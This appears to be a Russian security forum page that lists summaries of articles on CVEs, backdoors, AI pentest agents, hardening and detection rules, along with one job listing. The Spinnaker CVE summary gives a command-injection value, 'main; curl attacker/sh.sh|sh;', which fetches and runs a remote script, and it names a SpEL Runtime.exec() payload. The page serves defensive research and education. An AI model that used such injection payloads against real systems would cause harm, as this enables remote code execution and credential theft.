Форум информационной безопасности - Codeby.net
Статья FIRESTARTER на Cisco ASA: как бэкдор переживает патчи
6 месяцев dwell time на пропатченном Cisco Firepower: патч закрыл дверь, а FIRESTARTER уже внутри. Graceful shutdown — момент, когда имплант прописывает автозапуск в CSP_MOUNT_LIST.UAT-4356 (ArcaneDoor): CVE-2025-20362 (PR:N, автоматизируема) + CVE-2025-20333 (CVSS 9.9, RCE) через WebVPN. FIRESTARTER живёт в LINA-процессе — show version, show running-config, syslog молчат. Magic packet через WebVPN активирует без эксплуатации CVE. Полностью пропатченное устройство доступно бессрочно.
CSP_MOUNT_LIST модифицируется при SIGTERM → boot восстанавливает её до чистого состояния. Firmware upgrade = graceful shutdown = имплант выживает. Удаляет только hard power cycle или полный reimage. IBM X-Force: среднее время устранения CVE — 29 месяцев. CISA дала один день.
CLI-команда для проверки + YARA IOC + decision tree при подозрении на компрометацию.Статья AI-агенты в пентесте: от 91% на CTF до провала в Active Directory
PentestGPT v2: 91% на веб-задачах и 4/5 хостов в GOAD — но агент без throttling'а засвечивается быстрее шумного скрипт-кидди. Два типа отказов, которые не лечатся заменой модели.28 LLM-агентов проанализированы — и у всех один разлом. Type A (нет инструмента, плохой промпт) лечится инженерией. Type B (преждевременная фиксация на ветке, бесконечная разведка, забывание контекста на шаге 7) — нет. GPT-5 как backbone сжимает разрыв между агентами вдвое: архитектурные надстройки деградируют по мере прогресса моделей.
TDA — difficulty-aware planning — снижает долю Type B с 58% до 27%. State management удваивает результаты hackingBuddyGPT на privesc без замены модели. Sigma-набор на T1046 ловит агента раньше, чем он добирается до эксплуатации.
Decision tree: когда AI-агент даёт ROI, а когда — шум в логах SOC.Статья Символьное исполнение для поиска уязвимостей: angr, Manticore и Triton на практике
angr, Manticore, Triton: «wyvern» CSAW CTF 500 — 15 минут скриптом вместо часов в Ghidra. Честный разбор трёх символьных движков с decision tree и кодом.Символьное исполнение заменяет конкретный ввод символическими переменными, накапливает constraints на каждом ветвлении и скармливает Z3-солверу — тот находит ввод математически, без перебора. angr — CTF rev/pwn и AEG, еженедельные коммиты. Manticore — разработка остановлена, EVM-наработки ещё ценны. Triton — DSE поверх конкретного trace, незаменим для деобфускации VMProtect и Themida.
Path explosion убивает анализ на реальных бинарях: SHA-256 на критическом пути — стоп-сигнал. Concolic через angr+Unicorn: распаковка конкретно, символьный анализ включается после. Шесть строк кода на fauxware, strcpy_find за 2 секунды, автоматическая AEG.
Fuzzer за час находит то, что символьный движок ищет сутки — но concolic генерирует ввод через magic bytes.Статья CVE-2026-32604 и CVE-2026-32613: RCE в Spinnaker — от low-priv аутентификации до shell на clouddriver и Echo
CVE-2026-32604 и CVE-2026-32613 в Spinnaker: CVSS 9.9, любая аутентифицированная учётка — shell на clouddriver с production AWS credentials. Один PUT /artifacts/fetch.branch конкатенируется в sh -c без санитизации: «main; curl attacker/sh.sh|sh;» — и clouddriver выполняет произвольный скрипт. GET /artifacts/credentials отдаёт список аккаунтов любому пользователю без проверки ролей. Echo использует SpEL без sandbox — T(java.lang.Runtime).getRuntime().exec() работает напрямую, Orca прикрыли whitelist'ом, Echo — нет.
Post-exploitation: credentials в YAML-конфиге plaintext, IAM-роль через instance metadata, ServiceAccount token → K8s API, trusted mesh к Orca/Fiat/Echo без аутентификации. Два хопа, ноль дополнительных кредов — от low-priv учётки до production-инфраструктуры.
Decision table двух векторов и Falco-правило для детекта shell-spawn из JVM.Вакансия Ведущий специалист по Информационной Безопасности (PCI DSS & Fintech Compliance)
Ведущий специалист по ИБ (PCI DSS & Fintech Compliance) — HaaS, Москва, офис, 300 000–350 000 руб.Ищем эксперта, который возьмёт на себя полный цикл PCI DSS: от подготовки документации и внутренних аудитов до взаимодействия с аудиторами и прохождения ежегодной сертификации. В зоне ответственности — консультирование команд разработки и продукта, участие в запуске новых продуктов, актуализация политик ИБ.
Требуется практический опыт с PCI DSS, знание 152-ФЗ и 821-П. Плюсом: опыт с HSM Thales 10K, понимание архитектуры платёжных систем, финтех или банковский бэкграунд. Официальное трудоустройство по ТК РФ, белая зарплата, 5/2.
CV: @haas_maru в Telegram.Статья Network Policies в Kubernetes: изоляция подов на практике
По умолчанию каждый под в вашем кластере видит все остальные - flat network без границ. Один скомпрометированный контейнер открывает атакующему полный доступ к production-сервисам, базам данных и внутренним API. Именно так выглядит lateral movement в реальных инцидентах.
В этой статье разберём, как Network Policies превращают хаотичную сеть кластера в управляемые сегменты: синтаксис и логику политик, почему стандартный K8s API - это только половина решения, и чем Calico с Cilium закрывают то, что ванильный Kubernetes не умеет. Практический разбор: GlobalNetworkPolicy и DNS-based rules в Calico, L7-фильтрация HTTP-трафика и identity-based security в Cilium, паттерны default deny и микросегментации - с реальными YAML-манифестами и командами для проверки.Статья Харденинг Windows 10/11 после окончания поддержки: чеклист для пентестера и администратора
120 машин на Windows 10 22H2 после EOL — дефолтные GPO, открытый SMBv1, LSASS без RunAsPPL. Mimikatz снимал хеши без сопротивления. Три пентеста, один чеклист.После 14 октября 2025 каждая новая CVE в ядре Windows 10 — перманентный 0-day. Diff между патчем Windows 11 и непропатченной Win10 публикуется открыто — готовый Exploitation for Privilege Escalation T1068. Defender обновляет сигнатуры до 2028, но дыру в win32k.sys антивирусная сигнатура не заткнёт.
Три GPO за 15 минут закрывают 70% типового внутреннего пентеста: RunAsPPL + WDigest off (T1003.001), SMBv1 off (relay, legacy RCE), LLMNR/NBT-NS off (Responder за минуты). Таблица приоритетов из 8 мер: эффект к сложности, закрываемый ATT&CK-вектор для каждой.
HardeningKitty + PingCastle для автоматического аудита по CIS Benchmark v3.0.0.Статья Smoke тестирование и качество обратной связи: от прогона до действия в CI/CD
Smoke-тест поймал сломанный платёжный эндпоинт — но gate пропустил сборку по правилу «pass if >90%». В субботу клиенты не смогли оплатить заказ. Проблема не в тестах, а в feedback loop.Smoke без обратной связи — дымовой датчик с отключённой сиреной. allow_failure: true в GitLab CI превращает gate в декорацию. Уведомление в общий канал из 40 человек — никто не реагирует. Flaky rate выше 2% — команда перестаёт верить gate и начинает его обходить.
Четыре звена feedback loop: детекция → адресная нотификация автору коммита → диагностика с контекстом (Expected 200, got 503) → fix и перезапуск. Pytest + GitLab CI с allow_failure: false, маркеры critical/advisory для двух уровней gate, метрики: pass rate, MTTF, flaky rate, suite duration.
Проверка: уроните smoke намеренно и засеките, когда разработчик узнает.Статья CVE-2026-32202: уязвимость Windows Shell — zero-click кража NTLM-хешей через LNK-файлы
CVE-2026-32202: неполный патч февраля оставил zero-click кражу Net-NTLMv2 через .lnk — открыл папку в Explorer, хеш уже у атакующего. CVSS 4.3, но в домене это lateral movement.Microsoft залатал RCE (CVE-2026-21510, CVSS 8.8), но не тронул механизм аутентификации. Windows Shell резолвит UNC-путь из .lnk ещё до SmartScreen — SMB-хендшейк происходит на этапе path resolution. Responder перехватывает Net-NTLMv2 без единого клика. По документам UI:R, по факту — открытие папки в Explorer.
NTLM relay на Exchange/LDAP/SMB без SMB Signing, offline hashcat -m 5600 — C:L в CVSS не учитывает каскадный эффект. APT28 использовала тот же класс в январской кампании против Украины. CISA KEV, дедлайн 12 мая для федеральных агентств.
Sigma-правило: explorer.exe + outbound TCP 445 вне internal subnet — высокоприоритетный алерт.Статья Утечка данных криптобиржи в России 2026: взлом Grinex на $13,7 млн — разбор TTPs и detection-чеклист для SOC
Взлом Grinex: $13,7 млн за минуты. Преемник Garantex под санкциями США — и те же уязвимости в архитектуре. Kill chain по MITRE ATT&CK и Sigma-правила для SOC на реальных TTPs Q1 2026.Grinex запустился в марте 2026 как замена Garantex после блокировки FinCEN. Архитектура воспроизводилась в спешке — и воспроизвела уязвимости. Атака использовала скомпрометированные API-ключи и инсайдерский доступ к горячим кошелькам. Классический паттерн: privileged credential abuse без аномального детекта.
Разбор TTP: Initial Access через stolen API keys, lateral movement по внутренним сервисам без MFA, вывод через mixer-цепочку. Sigma-правила на аномальные API-запросы и массовый вывод. Чеклист для SOC финтех/крипто-платформ: privileged access audit, аномалии транзакций, мониторинг горячих кошельков.
Маппинг на MITRE ATT&CK и detection checklist.